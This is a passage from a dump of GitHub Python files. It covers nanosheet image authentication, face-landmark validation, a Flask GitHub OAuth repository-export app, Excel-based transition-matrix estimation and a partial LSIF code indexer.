sort by area, grab largest contour\n cnts, hierarchy = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n sorted_cnts = sorted(cnts, key=cv2.contourArea, reverse = True)\n cnts = sorted_cnts[0]\n\n #create an empty mask for the contour and draw filled contour\n mask = np.zeros(image.shape[:2], dtype=\"uint8\")\n cv2.drawContours(mask, [cnts], -1, 255, -1)\n\n mask = cv2.dilate(mask, kernel) #dilate 1 pixel to external contour\n\n #extract bounding rectangle of contour, use it to crop roi from mask.\n (x, y, w, h) = cv2.boundingRect(cnts)\n roi = mask[y:y + h, x:x + w]\n\n #compute Zernike Moments from roi, add to list.\n zMoments = mahotas.features.zernike_moments(mask, cv2.minEnclosingCircle(cnts)[1], degree=8)\n zMoments = zMoments[2:] #exlude first 2 Zernike moments for translation invariance\n zernikeMoments.append(zMoments)\n \n #return contour and its Zernike moments\n return (cnts, zernikeMoments)\n\n#define function to return L, W, A and L/W from a nanosheet contour\ndef measure_size(flake_contour):\n #calculate pixel size and area\n pixel_size = 1.0 / image_scale # in um\n pixel_area = pixel_size**2 #in um^2\n \n #calculate flake area in pixels and convert to um^2.\n flake_area = cv2.contourArea(flake_contour) #counts all pixels in contour\n flake_area = flake_area * pixel_area #unit conversion to um^2\n\n #Calculate flake L, W and L/W\n bounding_rect = cv2.minAreaRect(flake_contour) #create bounding rectangle with minimum area around contour\n (x,y), (w,h), angle = bounding_rect #x,y centre points of rectangle, w h, width and height of rectangle in pixels\n #take largest rectangle dimension as L and the shorter as W\n if h > w:\n lateral_size = h\n width = w\n else: \n lateral_size = w \n width = h\n lateral_size = lateral_size * pixel_size #convert units from pixels to um\n width = width * pixel_size #converts units from pixels to um\n \n ratio = lateral_size / width #compute aspect ratio\n\n return flake_area, lateral_size, width, ratio\n\nimage_scale = 12.9 #set image scale in pixels/um (measure from scale bar)\n\n#Define Reference Image i.e. nanosheet to check for authenticity\nref_filename = \"MoS2 Nanotag Duplicate/Duplicate MoS2 67.tif\" #define filepath\nrefImage = cv2.imread(ref_filename) \n\n#Get contours and zernike moments of the reference flake\n(refcnts, refZernikeMoment) = get_moments(ref_filename)\n\n#Define empty lists to store results\nimage_name_list = []\nzernike_distance_list = []\nsize_list = []\nwidth_list = []\narea_list = []\naspect_ratio_list = []\nzernike_list = []\n\n#Apply each function to each image in a defined folder of genuine nanotags\nfor filename in glob.glob('MoS2 Nanotags/*.tif'):\n \n #trim filename from filepath, append to list removing extension (.tif)\n head, tail = os.path.split(filename)\n image_name_list.append(tail[:-4])\n \n #get contours and Zernike moments from image\n (cnts, zernikeMoments) = get_moments(filename)\n zernike_list.append(zernikeMoments) #append moments to results list\n\n #compute zernike moment distances\n zmd = dist.cdist(refZernikeMoment, zernikeMoments) #calculate Euclidean distance between reference image moments and current image moments\n zernike_distance_list.append(zmd[0,0])\n \n #measure A, L, W, L/W from flake contour\n area, lateral_size, width, ratio = measure_size(cnts)\n\n #append all results to lists\n area_list.append(area)\n size_list.append(lateral_size)\n width_list.append(width)\n aspect_ratio_list.append(ratio)\n\n#find index of lowest ZMD i.e. 
most similar genuine flake to the reference image \nj = np.argmin(zernike_distance_list)\nprint(f\"The lowest zernike distance match to the scanned flake is: {image_name_list[j]}\") #print most similar genuine imaage name to terminal\nprint(f\"The zernike moment distance of this pair is: {zernike_distance_list[j]}\") #print ZMD score to terminal\n\n#make decision\nif zernike_distance_list[j] < 0.0315: #if the zernike distance is below the threshold (see manuscript) \n print(\"The scanned flake is genuine.\") #print decision to terminal\nelse: print(\"Sorry, the scanned flake is not in our dataset.\") #print decision to terminal\n\n#Load the most similar genuine image to the reference image\nmatch = cv2.imread(f\"{head}/{image_name_list[j]}.tif\")\n\n#define figure with set rows and columns\nfig = plt.figure(figsize=(6,3))\nrows = 1\ncolumns = 3\n\nfig.add_subplot(rows, columns, 1) #to position 1 in the figure\nplt.imshow(cv2.cvtColor(refImage, cv2.COLOR_BGR2RGB)) #load reference image, convert BGR to RGB to ensure correct colour in cv2.\nplt.axis('off') #turn off axis\nplt.title(\"Reference Image\") #add title\n\nfig.add_subplot(rows, columns, 2) #to position 2 in the figure\nplt.imshow(cv2.cvtColor(match, cv2.COLOR_BGR2RGB)) #load most similar image, convert BGR to RGB to ensure correct colour in cv2.\nplt.axis('off') #turn off axis\nplt.title(\"Most similar Flake\") #add title\n\nfig.add_subplot(rows, columns, 3) #to position 3 in the figure\n\n#if reference matches a genuine nanosheet\nif zernike_distance_list[j] < 0.0315: \n blank = np.ones(match.shape) #add blank white image with same dimensions as matched image\n plt.imshow(blank) #add image to position 3\n plt.axis('off') #turn off axis\n plt.title(\"Flake is legitimate.\") #add heading to show flake is legitmate.\n\n#if reference does not match genuine nanosheet\nelse:\n blank = np.ones(match.shape) #add blank white image with same dimension as matched image\n plt.imshow(blank) #add image to position 3\n plt.axis('off') #turn off axis\n plt.title(\"Flake is counterfeit.\") #add heading to show no match was found\n\nplt.tight_layout() #use tight layout\nplt.show() #show the final figure\n\n#----------COMPUTE ZMD SCORE OF ALL UNIQUE PAIRS--------------------#\n#only enable this code if all results are needed for the dataset\n\n#define empty list to store zernike moment distance for each flake pairing\nzernike_difference_list = []\n\n#nested for loop ensuring every contour is compared with every contour and itself, but not repeated. e.g. 00, 01, 02... 11, 12, 13... 
22, 23, 24...\nfor i in range(len(zernike_list)):\n zernike_diff = dist.cdist(zernike_list[i], zernike_list[i]) #calculate euclidean distance between moments of all pairs of identical images (ZMD = 0) e.g FLake 1 Flake 1\n zernike_difference_list.append(zernike_diff[0,0]) #append result to list\n\n for j in range(i+1, len(zernike_list)):\n zernike_diff = dist.cdist(zernike_list[i], zernike_list[j]) #calculate Euclidean distance between moments of all unique image pairs e.g Flake 1 FLake 2\n zernike_difference_list.append(zernike_diff[0,0])\n\n#define list to store compared name strings\nname_compare_list = [] \n\n#nested for loop ensuring we create new string from both image names compared, for each unique image pairing\nfor i in range(len(image_name_list)):\n names_compared = str(f\"{image_name_list[i]} {image_name_list[i]}\") #between every pair of identical images e.g FLake 1 Flake 1\n name_compare_list.append(names_compared)\n for j in range(i+1, len(image_name_list)):\n names_compared = str(f\"{image_name_list[i]} {image_name_list[j]}\") #between every unique pair of images e.g FLake 1 Flake 2\n name_compare_list.append(names_compared)\n\n\n#--------------EXPORT FLAKE PARAMETERS TO .CSV FILE, ENABLE IF NEEDED-------------------#\n#Create tab delimited .csv file tabulating flake morphological parameter data\nheaders = [\"Flake Number\", \"Lateral Size / nm\", \"Width / nm\", \"Area / um^2\", \"L/W Aspect Ratio\"] #define collumn headers\nwith open('MoS2 Flake Parameters.csv', 'w', newline = '') as file: #create new .csv tab delimited document with specified file name ensuring no gaps between rows\n writer = csv.writer(file, delimiter='\\t')\n dw = csv.DictWriter(file, delimiter = '\\t', fieldnames=headers)\n dw.writeheader()\n writer.writerows(zip(image_name_list, size_list, width_list, area_list, aspect_ratio_list)) #zip results lists and write row by row\n\n#create tab delimiter .csv file tabulating ZMD scores and names\nheaders = [\"Flakes compared\", \"ZMD Score\"] #define collumn headers\nwith open('MoS2 Nanotag ZMD scores.csv', 'w', newline = '') as file: #create new .csv tab delimited document with specified file name ensuring no gaps between rows\n writer = csv.writer(file, delimiter='\\t')\n dw = csv.DictWriter(file, delimiter = '\\t', fieldnames=headers)\n dw.writeheader()\n writer.writerows(zip(name_compare_list, zernike_difference_list)) #zip results lists and write row by row\n","repo_name":"ORead15/2DM-Anticounterfeiting","sub_path":"Authenticity Check MoS2.py","file_name":"Authenticity Check MoS2.py","file_ext":"py","file_size_in_byte":10205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34646381007","text":"from face_detection.FaceModel import FaceModel\nfrom face_detection.ShapeAnalizer import ShapeAnalizer\n\n\nclass FaceModelValidator:\n __MAX_PERCENT_DIFFERENCE_IN_EYES_WIDTH = 7\n\n def __init__(self, shape_analizer: ShapeAnalizer, mandatory_face_height_percent: int) -> None:\n self.__shape_analizer = shape_analizer\n self.__mandatory_face_height_percent = mandatory_face_height_percent\n\n def is_valid(self, image, model: FaceModel) -> bool:\n if not model.has_detection() or not self.__is_face_proportion_right(image, model)\\\n or not self.__are_eyes_width_equal(model):\n return False\n\n return True\n\n def __is_face_proportion_right(self, image, model: FaceModel) -> bool:\n face_height = self.__shape_analizer.get_height(model.all_points)\n image_height, _ = image.shape[:2]\n minimum_accepted_height = 
int(image_height * self.__mandatory_face_height_percent / 100)\n\n return face_height >= minimum_accepted_height\n\n def __are_eyes_width_equal(self, model: FaceModel) -> bool:\n left_eye_width = self.__shape_analizer.get_width(model.get_left_eye())\n right_eye_width = self.__shape_analizer.get_width(model.get_right_eye())\n if left_eye_width - right_eye_width == 0:\n return True\n percent_difference_in_width = int((\n abs(left_eye_width - right_eye_width) /\n max(left_eye_width, right_eye_width)\n ) * 100)\n\n return percent_difference_in_width <= self.__MAX_PERCENT_DIFFERENCE_IN_EYES_WIDTH","repo_name":"danionescu0/image-processing-projects","sub_path":"eye-mouth-remote-controll/face_detection/FaceModelValidator.py","file_name":"FaceModelValidator.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"29010954619","text":"from flask import Flask, request, redirect, session, url_for, render_template, Response\nimport requests\nfrom urllib.parse import urlencode, parse_qs\nimport os\nimport psycopg2\nimport csv\nimport io\n\napp = Flask(__name__)\n\n# loading env data\ntry:\n from dotenv import load_dotenv\n\n load_dotenv()\nexcept Exception as err:\n print(err)\n\napp.secret_key = os.environ.get(\"SECRET_KEY\")\ngithub_client_id = os.environ.get(\"CLIENT_ID\")\ngithub_client_secret = os.environ.get(\"CLIENT_SECRET\")\nhosting_url = \"http://localhost:5000\"\n\n\n@app.route(\"/\")\ndef home():\n # checks if user has already logged in\n # the session contains the owner_id of the user if he has logged in\n if \"logged_in\" in session:\n conn = psycopg2.connect(\n host=\"127.0.0.1\",\n database=\"postgres\",\n user=\"postgres\",\n password=os.environ.get(\"DB_PASS\"),\n )\n cursor = conn.cursor()\n\n select_query = \"\"\"\n SELECT repo_info.id, repo_info.name, repo_info.status, repo_info.stars, repo_info.forks\n FROM user_info\n INNER JOIN repo_info ON user_info.owner_id = repo_info.owner_id\n WHERE user_info.owner_id = %s\n \"\"\"\n select_values = (session[\"logged_in\"],)\n # Execute the query\n cursor.execute(select_query, select_values)\n\n # Fetch all the results\n repo_results = cursor.fetchall()\n\n select_query = \"SELECT * FROM user_info WHERE owner_id = %s\"\n select_values = (session[\"logged_in\"],)\n cursor.execute(select_query, select_values)\n user_data = cursor.fetchone()\n\n # Close the database connection\n cursor.close()\n conn.close()\n\n return render_template(\n \"home.html\", repo_results=repo_results, user_data=user_data\n )\n\n # the error occured in callback process is stored in sesssion\n elif \"error\" in session:\n return render_template(\"login.html\", error_msg=session[\"error\"])\n else:\n return render_template(\"login.html\")\n\n\n@app.route(\"/logout\")\ndef logout():\n # the owner id is removed from session\n session.pop(\"logged_in\", None)\n return redirect(url_for(\"home\"))\n\n\n@app.route(\"/login\")\ndef login():\n params = {\n \"client_id\": github_client_id,\n \"redirect_uri\": hosting_url + \"/callback\",\n \"scope\": \"repo\",\n }\n return redirect(f\"https://github.com/login/oauth/authorize?{urlencode(params)}\")\n\n\n@app.route(\"/callback\")\ndef callback():\n code = request.args.get(\"code\")\n data = {\n \"client_id\": github_client_id,\n \"client_secret\": github_client_secret,\n \"code\": code,\n \"redirect_uri\": hosting_url + \"/callback\",\n }\n response = requests.post(\n \"https://github.com/login/oauth/access_token\",\n data=data,\n 
headers={\"Accept\": \"application/json\"},\n )\n\n access_token = response.json()[\"access_token\"]\n\n headers = {\n \"Authorization\": f\"Bearer {access_token}\",\n \"Accept\": \"application/vnd.github.v3+json\",\n }\n\n user_info_response = requests.get(\"https://api.github.com/user\", headers=headers)\n repo_info_response = requests.get(\n \"https://api.github.com/user/repos\", headers=headers\n )\n\n # putting data in postgres if response is success\n if user_info_response.status_code == 200 and repo_info_response.status_code == 200:\n userdata = user_info_response.json()\n repodata = repo_info_response.json()\n\n avatar_url = userdata[\"avatar_url\"]\n followers_count = int(userdata[\"followers\"])\n following_count = int(userdata[\"following\"])\n userid = userdata[\"login\"]\n bio = userdata[\"bio\"]\n email = userdata[\"email\"]\n owner_id = str(userdata[\"id\"])\n name = userdata[\"name\"]\n\n repo_list = []\n for repo in repo_info_response.json():\n if repo[\"owner\"][\"login\"] == userid:\n repo_list.append(\n {\n \"id\": repo[\"id\"],\n \"name\": repo[\"name\"],\n \"status\": repo[\"visibility\"],\n \"stars\": repo[\"stargazers_count\"],\n \"forks\": repo[\"forks_count\"],\n }\n )\n\n try:\n conn = psycopg2.connect(\n host=\"127.0.0.1\",\n database=\"postgres\",\n user=\"postgres\",\n password=os.environ.get(\"DB_PASS\"),\n )\n cursor = conn.cursor()\n\n create_query = \"\"\"CREATE TABLE IF NOT EXISTS user_info (\n avatar_url VARCHAR(255),\n followers_count INTEGER,\n following_count INTEGER,\n userid VARCHAR(255),\n bio VARCHAR(255),\n email VARCHAR(255),\n owner_id VARCHAR(255) PRIMARY KEY,\n name VARCHAR(255)\n );\"\"\"\n cursor.execute(create_query)\n\n # Define the SELECT query to check if data already exists\n select_query = \"SELECT COUNT(*) FROM user_info WHERE owner_id = %s\"\n select_values = (owner_id,)\n cursor.execute(select_query, select_values)\n count = cursor.fetchone()[0]\n\n if count > 0:\n # Data already exists, so update it\n update_query = \"UPDATE user_info SET avatar_url = %s, followers_count = %s, following_count = %s, userid = %s, bio = %s, email = %s, name = %s WHERE owner_id = %s\"\n update_values = (\n avatar_url,\n followers_count,\n following_count,\n userid,\n bio,\n email,\n name,\n owner_id,\n )\n cursor.execute(update_query, update_values)\n else:\n # Data doesn't exist, so insert it\n insert_query = \"INSERT INTO user_info (avatar_url, followers_count, following_count, userid, bio, email, owner_id, name) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)\"\n insert_values = (\n avatar_url,\n followers_count,\n following_count,\n userid,\n bio,\n email,\n owner_id,\n name,\n )\n cursor.execute(insert_query, insert_values)\n\n conn.commit()\n\n # Create the repo_info table if it doesn't exist\n create_table_query = \"\"\"\n CREATE TABLE IF NOT EXISTS repo_info (\n owner_id VARCHAR(255) REFERENCES user_info(owner_id),\n id VARCHAR(255) PRIMARY KEY,\n name VARCHAR(255),\n status VARCHAR(255),\n stars INTEGER,\n forks INTEGER\n )\n \"\"\"\n cursor.execute(create_table_query)\n\n for repo in repo_list:\n id = str(repo[\"id\"])\n name = repo[\"name\"]\n status = repo[\"status\"]\n stars = int(repo[\"stars\"])\n forks = int(repo[\"forks\"])\n\n select_query = \"SELECT COUNT(*) FROM repo_info WHERE id = %s\"\n select_values = (id,)\n cursor.execute(select_query, select_values)\n count = cursor.fetchone()[0]\n\n if count > 0:\n # Repo data already exists, so update it\n update_query = \"UPDATE repo_info SET name = %s, status = %s, stars = %s, forks = %s WHERE 
id = %s\"\n update_values = (name, status, stars, forks, id)\n cursor.execute(update_query, update_values)\n\n else:\n # Repo data does not exist, so insert a new record\n insert_query = \"INSERT INTO repo_info (owner_id, id, name, status, stars, forks) VALUES (%s, %s, %s, %s, %s, %s)\"\n insert_values = (owner_id, id, name, status, stars, forks)\n cursor.execute(insert_query, insert_values)\n\n conn.commit()\n cursor.close()\n conn.close()\n\n session.pop(\"error\", None)\n except:\n print(\"DB Error\")\n session[\"error\"] = \"Database Error\"\n\n if \"error\" not in session:\n session[\"logged_in\"] = owner_id\n else:\n session[\"error\"] = str(user_info_response.status_code) + \" \" + \"Error\"\n\n return redirect(url_for(\"home\"))\n\n\n@app.route(\"/download\")\ndef download():\n if \"logged_in\" in session:\n conn = psycopg2.connect(\n host=\"127.0.0.1\",\n database=\"postgres\",\n user=\"postgres\",\n password=os.environ.get(\"DB_PASS\"),\n )\n\n csv_filename = session[\"logged_in\"] + \".csv\"\n csv_buffer = io.StringIO()\n csv_writer = csv.writer(csv_buffer)\n\n # writing header\n csv_writer.writerow(\n [\n \"Owner ID\",\n \"Owner Name\",\n \"Owner Email\",\n \"Repo ID\",\n \"Repo Name\",\n \"Status\",\n \"Stars Count\",\n ]\n )\n\n # Fetch the data from the user_info and repo_info tables and write it to the CSV file\n cursor = conn.cursor()\n select_query = \"\"\"\n SELECT u.owner_id, u.name, u.email, r.id, r.name, r.status, r.stars \n FROM user_info u INNER JOIN repo_info r ON u.owner_id = r.owner_id\n WHERE u.owner_id = %s\n \"\"\"\n select_values = (session[\"logged_in\"],)\n cursor.execute(select_query, select_values)\n rows = cursor.fetchall()\n\n for row in rows:\n # If email is NULL, replace it with an empty string\n email = row[2] if row[2] is not None else \"\"\n csv_writer.writerow([row[0], row[1], email, row[3], row[4], row[5], row[6]])\n\n cursor.close()\n conn.close()\n\n # Create a Flask response object to return the CSV file as a download\n csv_output = csv_buffer.getvalue()\n response = Response(csv_output, mimetype=\"text/csv\")\n response.headers.set(\n \"Content-Disposition\", f\"attachment; filename={csv_filename}\"\n )\n return response\n\n else:\n return redirect(url_for(\"home\"))\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"thenithinbalaji/Repolist","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"22598882321","text":"import pandas as pd\r\nimport numpy as np\r\nimport time,datetime\r\nfrom datetime import datetime, timedelta\r\nimport yaml\r\nimport os\r\nfrom openpyxl import load_workbook\r\n# folder to load config file\r\nCONFIG_PATH = \"./Data initializers/\"\r\n# Function to load yaml configuration file\r\ndef load_config(config_name):\r\n with open(os.path.join(CONFIG_PATH, config_name)) as file:\r\n config = yaml.safe_load(file)\r\n return config\r\n\r\nconfig = load_config(\"data_loader_results.yaml\")\r\n# load data\r\ntype_description = pd.read_excel(os.path.join(config[\"data_directory\"], config[\"data_name\"]),sheet_name=config['sheet_type_description'])\r\n\r\ntype_list = sorted(type_description[config['type']].unique())\r\n\r\nfor t in range(len(type_list)):\r\n type= type_description[type_description[config['type']] == type_list[t]]\r\n description = sorted(type[config['description']].unique())\r\n cell_list= type[config['cell_id']].unique()\r\n Matrix = 
np.zeros(shape=(len(description), len(description)), dtype=float)\r\n for i in range(len(description)):\r\n description_number = 0\r\n for cell in cell_list:\r\n type_cell = type[type[config['cell_id']] == cell]\r\n interval_list = type_cell[config['interval_number']].unique()\r\n for interval in interval_list:\r\n type_cell_interval = type_cell[type_cell[config['interval_number']] == interval]\r\n type_cell_interval = type_cell_interval.reset_index(drop=True)\r\n for l in range(len(type_cell_interval) - 1):\r\n if (type_cell_interval.loc[l, config['description']] == description[i]):\r\n description_number = description_number + 1\r\n for j in range(len(description)):\r\n transition_number = 0\r\n for cell in cell_list:\r\n type_cell = type[type[config['cell_id']] == cell]\r\n interval_list = type_cell[config['interval_number']].unique()\r\n for interval in interval_list:\r\n type_cell_interval = type_cell[type_cell[config['interval_number']] == interval]\r\n type_cell_interval = type_cell_interval.reset_index(drop=True)\r\n for l in range(len(type_cell_interval) - 1):\r\n if (type_cell_interval.loc[l, config['description']] == description[i]) & (type_cell_interval.loc[l + 1, config['description']] == description[j]):\r\n transition_number = transition_number + 1\r\n if description_number == 0:\r\n if i == j:\r\n Matrix[i][j] = 1\r\n else:\r\n Matrix[i][j] = 0\r\n else:\r\n Matrix[i][j] = transition_number / description_number\r\n transition_matrix = pd.DataFrame(Matrix,index=description,columns=description)\r\n\r\n path_result = os.path.join(config[\"data_directory\"], config[\"data_name\"])\r\n book = load_workbook(path_result)\r\n writer_result = pd.ExcelWriter(path_result, engine='openpyxl')\r\n writer_result.book = book\r\n\r\n transition_matrix.to_excel(writer_result, sheet_name=str(type_list[t]))\r\n writer_result.save()\r\n","repo_name":"AlineMefleh/Approach3-Configuration","sub_path":"Anomaly-Detection-Alarms/Paramaters-Estimation/Transition-Matrix.py","file_name":"Transition-Matrix.py","file_ext":"py","file_size_in_byte":3171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28813406530","text":"import abc\nimport dataclasses\nimport json\nfrom functools import cached_property\nfrom pathlib import Path\nfrom typing import Any\nfrom typing import Dict\nfrom typing import Generator\nfrom typing import List\nfrom typing import Optional\nfrom typing import Tuple\n\nfrom jedi.api import Script\nfrom jedi.api.classes import Name\n\nfrom lsif.padawan import Definition\nfrom lsif.padawan import Reference\nfrom lsif.types import Range\nfrom lsif.types import Writer\n\n__version__ = \"0.1.0\"\n\n\n# THREAD\nIGNORE_ID = -1\n\n\ndef _get_next_id() -> Generator[int, None, None]:\n count = 1\n while True:\n yield count\n count += 1\n\n\nclass BaseNode(abc.ABC):\n __id_generator = _get_next_id()\n id: int\n\n _base_fields: Tuple[str, ...] 
= (\"label\", \"type\", \"id\")\n\n @property\n @abc.abstractmethod\n def type(self) -> str:\n raise NotImplementedError\n\n @property\n @abc.abstractmethod\n def label(self) -> str:\n raise NotImplementedError\n\n @property\n @abc.abstractmethod\n def _fields(self) -> Tuple[str, ...]:\n raise NotImplementedError\n\n def __init__(self, id: Optional[int] = None) -> None:\n self.id = id or next(self.__id_generator)\n\n def to_dictionary(self) -> Dict[str, Any]:\n fields = list(self._base_fields + self._fields)\n\n # Can pass IGNORE_ID to not serialize ID\n # Thus far, only metadata needs this.\n if self.id == IGNORE_ID:\n fields.remove(\"id\")\n\n return {field: getattr(self, field) for field in fields}\n\n def serialize(self) -> str:\n return json.dumps(self.to_dictionary()) + \"\\n\"\n\n\nclass EdgeBase(BaseNode):\n type = \"edge\"\n\n def __init__(self) -> None:\n super().__init__()\n\n\nclass NextNode(EdgeBase):\n label = \"next\"\n\n inV: int\n outV: int\n\n _fields = (\"inV\", \"outV\")\n\n def __init__(self, inV: int, outV: int) -> None:\n super().__init__()\n self.inV = inV\n self.outV = outV\n\n\nclass SingleEdgeBase(EdgeBase):\n inV: int\n outV: int\n\n _fields = (\"inV\", \"outV\")\n\n def __init__(self, inV: int, outV: int) -> None:\n super().__init__()\n self.inV = inV\n self.outV = outV\n\n\nclass TextDocumentHoverNode(SingleEdgeBase):\n label = \"textDocument/hover\"\n\n\nclass TextDocumentDefinitionNode(SingleEdgeBase):\n label = \"textDocument/definition\"\n\n\nclass TextDocumentReferenceNode(SingleEdgeBase):\n label = \"textDocument/references\"\n\n\nclass MultiEdgeBase(EdgeBase):\n inVs: List[int]\n outV: int\n\n _fields: Tuple[str, ...] = (\"inVs\", \"outV\")\n\n def __init__(self, inVs: List[int], outV: int) -> None:\n super().__init__()\n self.inVs = inVs\n self.outV = outV\n\n\nclass ItemNode(MultiEdgeBase):\n label = \"item\"\n document: int\n\n _fields = (\"document\", *MultiEdgeBase._fields)\n\n def __init__(self, document: \"DocumentNode\", *args, **kwargs) -> None:\n super().__init__(*args, **kwargs)\n\n self.document = document.id\n\n\nclass ContainsNode(MultiEdgeBase):\n label = \"contains\"\n\n\nclass VertexBase(BaseNode):\n type = \"vertex\"\n\n def __init__(self, *args: Any, **kwargs: Any) -> None:\n super().__init__(*args, **kwargs)\n\n\nclass MetadataNode(VertexBase):\n \"\"\"Node for metadata stuff\"\"\"\n\n label = \"metaData\"\n\n _fields = (\"version\", \"positionEncoding\", \"projectRoot\")\n\n \"\"\" The version of the LSIF format using semver notation. See https://semver.org/. Please note\n the version numbers starting with 0 don't adhere to semver and adopters have to assume\n the each new version is breaking.\n \"\"\"\n version: str = \"0.5.0\"\n\n \"\"\" Always utf-16 because lsp. 
\"\"\"\n positionEncoding: str = \"utf-16\"\n\n \"\"\" The project root (in form of an URI) used to compute this dump.\"\"\"\n projectRoot: str\n\n def __init__(self, projectRoot: Path) -> None:\n super().__init__(id=IGNORE_ID)\n self.projectRoot = projectRoot.absolute().as_uri()\n\n\nclass ProjectNode(VertexBase):\n label = \"project\"\n kind = \"python\"\n\n _fields = (\"label\", \"kind\")\n\n\nclass DocumentNode(VertexBase):\n \"\"\"{\n id : 1,\n type : \"vertex\",\n label : \"document\",\n uri : \"file:///Users/dirkb/sample.ts\",\n languageId : \"typescript\"\n }\n \"\"\"\n\n label = \"document\"\n languageId: str = \"python\"\n\n _fields = (\"label\", \"languageId\", \"uri\")\n\n uri: str\n path: Path\n\n def __init__(self, path: Path) -> None:\n super().__init__()\n self.path = path.absolute()\n self.uri = self.path.as_uri()\n\n @cached_property\n def script(self) -> Script:\n return Script(path=str(self.path))\n\n\nclass ResultSetNode(VertexBase):\n label = \"resultSet\"\n _fields = tuple()\n\n def __init__(self) -> None:\n super().__init__()\n\n\nclass RangeNode(VertexBase):\n label = \"range\"\n _fields = (\"start\", \"end\", \"document\")\n\n _range: Range\n _document: DocumentNode\n\n def __init__(self, range: Range, document: DocumentNode) -> None:\n super().__init__()\n self._range = range\n self._document = document\n\n @property\n def start(self) -> Dict:\n return dataclasses.asdict(self._range.start)\n\n @property\n def end(self) -> Dict:\n return dataclasses.asdict(self._range.end)\n\n @property\n def document(self) -> int:\n return self._document.id\n\n\nclass HoverResult(VertexBase):\n label = \"hoverResult\"\n result: Dict\n\n _fields = (\"result\",)\n\n def __init__(self, definition: Definition) -> None:\n super().__init__()\n self.result = {\"contents\": [definition.docstring]}\n\n\nclass DefinitionResult(VertexBase):\n label = \"definitionResult\"\n _fields = tuple()\n\n\nclass ReferenceResult(VertexBase):\n label = \"referenceResult\"\n _fields = tuple()\n\n\n_ = \"\"\"\n// The document\n{ id: 4, type: \"vertex\", label: \"document\", uri: \"file:///Users/dirkb/sample.ts\", languageId: \"typescript\" }\n\n// The bar declaration\n{ id: 6, type: \"vertex\", label: \"resultSet\" }\n{ id: 9, type: \"vertex\", label: \"range\", start: { line: 0, character: 9 }, end: { line: 0, character: 12 } }\n{ id: 10, type: \"edge\", label: \"next\", outV: 9, inV: 6 }\n\"\"\"\n\n\ndef index(project_path: Path, writer: Writer) -> None:\n mt = MetadataNode(project_path)\n writer.write(mt.serialize())\n\n project_node = ProjectNode()\n writer.write(project_node.serialize())\n\n names_to_result_sets: Dict[str, ResultSetNode] = {}\n module_path_to_document_node: Dict[str, DocumentNode] = {}\n\n document_ids: List[int] = []\n\n for file in project_path.glob(\"**/*.py\"):\n # TODO: Keep track of the ranges to associate them with this document\n print(\"Parsing:\", file)\n\n filepath = Path(file)\n abs_path = str(filepath.absolute())\n document_node = module_path_to_document_node.get(abs_path, None)\n if not document_node:\n document_node = DocumentNode(filepath)\n writer.write(document_node.serialize())\n\n document_ids.append(document_node.id)\n module_path_to_document_node[str(document_node.script.path.absolute())] = document_node\n\n contained_ranges: List[RangeNode] = []\n\n # I think this is always empty\n # names = document.script.get_names(all_scopes=True, definitions=False, references=False)\n # print(names)\n\n definitions = document_node.script.get_names(all_scopes=True, 
definitions=True, references=False)\n for jedi_def in definitions:\n result_set = ResultSetNode()\n\n def_name = jedi_def.full_name or jedi_def.name\n print(def_name)\n assert def_name, f\"Missing name for: {jedi_def}\"\n\n names_to_result_sets[def_name] = result_set\n\n definition = Definition(jedi_def)\n definition_node = RangeNode(range=definition.range, document=document_node)\n\n contained_ranges.append(definition_node)\n\n writer.write(result_set.serialize())\n writer.write(definition_node.serialize())\n\n definition_next_node = NextNode(inV=result_set.id, outV=definition_node.id)\n writer.write(definition_next_node.serialize())\n\n hover_node = HoverResult(definition=definition)\n writer.write(hover_node.serialize())\n\n writer.write(TextDocumentHoverNode(inV=hover_node.id, outV=result_set.id).serialize())\n\n definition_result_node = DefinitionResult()\n writer.write(definition_result_node.serialize())\n\n writer.write(TextDocumentDefinitionNode(inV=definition_result_node.id, outV=result_set.id).serialize())\n writer.write(\n ItemNode(inVs=[definition_node.id], outV=definition_result_node.id, document=document_node).serialize()\n )\n\n references = document_node.script.get_names(all_scopes=True, definitions=False, references=True)\n for jedi_ref in references:\n reference = Reference(jedi_ref)\n reference_node = RangeNode(range=reference.range, document=document_node)\n contained_ranges.append(reference_node)\n\n writer.write(reference_node.serialize())\n\n possible_definitions = jedi_ref.goto(follow_imports=True)\n if not possible_definitions:\n print(\"No definitions found:\", jedi_ref)\n continue\n\n jedi_reference_def = possible_definitions[0]\n if jedi_reference_def.full_name not in names_to_result_sets:\n print(\"SKIPPING:\", jedi_reference_def, jedi_reference_def.module_name)\n continue\n\n jedi_reference_def_name = jedi_reference_def.full_name\n assert jedi_reference_def_name\n jedi_reference_def_result_set = names_to_result_sets[jedi_reference_def_name]\n\n writer.write(NextNode(inV=jedi_reference_def_result_set.id, outV=reference_node.id).serialize())\n\n reference_result_node = ReferenceResult()\n writer.write(reference_result_node.serialize())\n\n writer.write(\n TextDocumentReferenceNode(\n inV=reference_result_node.id, outV=jedi_reference_def_result_set.id\n ).serialize()\n )\n\n writer.write(\n ItemNode(inVs=[reference_node.id], outV=reference_result_node.id, document=document_node).serialize()\n )\n\n # I make this edge earlier maybe? 
